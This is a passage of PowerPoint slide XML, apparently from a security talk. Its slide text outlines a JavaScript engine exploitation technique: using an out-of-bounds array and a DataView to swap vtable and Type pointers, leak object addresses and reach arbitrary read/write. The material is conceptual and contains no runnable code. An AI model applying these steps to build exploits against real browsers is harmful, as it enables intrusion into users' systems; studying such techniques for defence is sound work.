              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="组合 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E08B5582-8FB8-43C0-8C49-531CE58FCF8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5438775" y="2550693"/>
            <a:ext cx="6570095" cy="4231107"/>
            <a:chOff x="12549325" y="5188849"/>
            <a:chExt cx="11850412" cy="7453096"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="33" name="组合 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3BE5F98-1DFC-4E14-81A2-BEC3BCB9B1E6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="12579188" y="5188849"/>
              <a:ext cx="11820549" cy="7453096"/>
              <a:chOff x="12579187" y="5188848"/>
              <a:chExt cx="7670443" cy="4836369"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="35" name="图片 34">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68960B49-C4B5-485B-BC6C-3ED85ACFE054}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12599987" y="5188848"/>
                <a:ext cx="7649643" cy="1143160"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="36" name="图片 35">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FDFE964-807A-4B5D-AC5A-EE4D61854411}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12599985" y="6340664"/>
                <a:ext cx="7611537" cy="438211"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="图片 36">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2529281-0A18-4CE4-ADD5-942BCD75E094}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12579187" y="7961524"/>
                <a:ext cx="7582958" cy="447737"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="38" name="图片 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{155A04D7-A243-4B4A-B747-D6BD1C2EC71B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId7"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12579187" y="8415492"/>
                <a:ext cx="7553325" cy="1152525"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="39" name="图片 38">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE9EA193-2E6D-4014-9BBB-4A46C2C18080}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId8"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12579187" y="9568017"/>
                <a:ext cx="7610475" cy="457200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="图片 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD156C16-C7BB-4536-9D65-0F7D9B4DE9E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="12549325" y="7675983"/>
              <a:ext cx="11669928" cy="1735902"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="矩形 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67117C0-8AC3-4345-926A-B1A59EBA3F15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7263716" y="3158380"/>
            <a:ext cx="120972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41" name="矩形 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3199F47-D14D-492B-A648-DD54C211556E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9648776" y="2951545"/>
            <a:ext cx="112590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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="5" name="连接符: 肘形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71E1A00B-D6E6-47B1-918F-8488E90CB2D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="40" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8473440" y="3032760"/>
            <a:ext cx="1175336" cy="224816"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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2" name="矩形 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB9A2EA5-4BC2-4C0F-8836-D12B05AF20EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7263716" y="5991187"/>
            <a:ext cx="120972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43" name="矩形 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3CA61FA-554A-44EC-A8EE-225EA6A0AF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="9648776" y="5784352"/>
            <a:ext cx="112590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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="44" name="连接符: 肘形 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0830A6C-D4F5-4A42-8169-E3D590203578}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="42" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="8473440" y="5865567"/>
            <a:ext cx="1175336" cy="224816"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">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5" name="矩形 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00965929-6074-488E-BC0B-49D683A3B2E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7181097" y="4156651"/>
            <a:ext cx="120972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sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="矩形 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6511C95-5CB9-46F1-9A38-53FD8B3FE5A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7187036" y="4568200"/>
            <a:ext cx="1209724" cy="19839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kumimoji="1" lang="zh-CN" altLang="en-US" sz="7729">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="连接符: 肘形 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65AA3A9B-71F8-4CCC-9FF8-7C5321AC50E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="46" idx="1"/>
            <a:endCxn id="45" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="7181098" y="4255848"/>
            <a:ext cx="5939" cy="411549"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 972283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91898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119FA7E2-5902-4B9E-9F56-F7B4DEB38904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="4079707" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to leak an object address?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29090BED-8EF6-4CA9-9C83-C2C3D0EA5EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1666377" y="3430463"/>
            <a:ext cx="4732806" cy="6233893"/>
            <a:chOff x="1732499" y="4441162"/>
            <a:chExt cx="6865485" cy="9042987"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="矩形 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35B3D715-9540-4312-ABB1-B272467B7EE6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1732499" y="4441162"/>
              <a:ext cx="6852784" cy="9301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Out of bound segment of a</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="矩形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C1EBC6-8FE0-4B9C-9807-83D84038C8FD}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1732499" y="12554005"/>
              <a:ext cx="6852784" cy="9301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Integer array object named c</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="48" name="文本框 47">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A565B8B4-AA5F-4C3C-999F-9A37753D94AE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4406416" y="5826833"/>
              <a:ext cx="1504950" cy="667875"/>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50" name="矩形 49">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B34693-F21B-4A44-B0DF-4370F68BD1DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1732499" y="11614795"/>
              <a:ext cx="6852784" cy="9301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err="1"/>
                <a:t>DataView</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t> object named b</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="文本框 50">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FBF28B-F300-4EAA-9789-BCA84CC8875C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4406416" y="10491395"/>
              <a:ext cx="1504950" cy="667875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>…………</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="矩形 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24F90E07-988B-40EF-ACE1-01F646EAC616}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1732499" y="9277915"/>
              <a:ext cx="6852784" cy="9301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integer array with an out-of-bounds segment named a</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="矩形 52">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD159B1B-A6F3-42AC-8DC0-4E0955E4C5FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1732499" y="6762245"/>
              <a:ext cx="6852784" cy="9301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segment named c</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="54" name="连接符: 肘形 53">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A57458D-6F57-4F6A-84C8-E0BCE4510D34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="31" idx="1"/>
              <a:endCxn id="53" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1732499" y="7227319"/>
              <a:ext cx="12701" cy="5791760"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 73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5" name="连接符: 肘形 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2880794-5494-4AD7-88A0-96E7F6BAD07F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="52" idx="1"/>
              <a:endCxn id="30" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="1732499" y="4906236"/>
              <a:ext cx="12701" cy="4836753"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 3900000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent2"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent2"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="56" name="连接符: 肘形 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB39ACB-CCDC-4074-BAC6-A59E2E9BD1A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:stCxn id="30" idx="3"/>
              <a:endCxn id="50" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8585283" y="4906235"/>
              <a:ext cx="12701" cy="7173633"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 6900000"/>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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="57" name="连接符: 肘形 56">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BB679B8-846F-4AC1-83D5-F53726E68422}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="30" idx="3"/>
              <a:endCxn id="31" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8585283" y="4906233"/>
              <a:ext cx="12701" cy="8112844"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 11250000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="92D050"/>
              </a:solidFill>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="3">
              <a:schemeClr val="accent2"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent2"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent2"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="矩形 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F86FFE46-2C63-49EF-AF9C-B881E46464F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7590656" y="4071669"/>
            <a:ext cx="4423412" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access the segment of the integer array C through the </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DataView</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> object to determine its index</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Save the virtual table pointer and the Type pointer in integer array</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assign an element of integers   array to any object that you want to leak</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace virtual table pointer and Type pointer of object array C</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Read the first two elements of the object array C</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4116124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:Achieve AAR/AAW</a:t>
              </a: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119FA7E2-5902-4B9E-9F56-F7B4DEB38904}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="6943760" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
